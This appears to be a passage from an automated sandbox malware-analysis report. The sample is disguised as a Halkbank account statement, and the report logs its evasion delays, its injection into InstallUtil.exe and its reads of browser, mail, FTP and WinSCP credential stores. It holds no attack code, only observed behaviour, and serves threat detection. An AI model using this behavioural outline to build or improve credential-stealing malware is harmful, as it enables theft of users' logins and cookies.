                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe TID: 6664Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 3876Thread sleep count: 152 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6952Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6956Thread sleep count: 5109 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6956Thread sleep count: 3660 > 30
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 6036Thread sleep count: 130 > 30
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 2536Thread sleep count: 87 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A5BB28 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10EA008
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeQueries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.386534863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.386867081.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.386199386.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
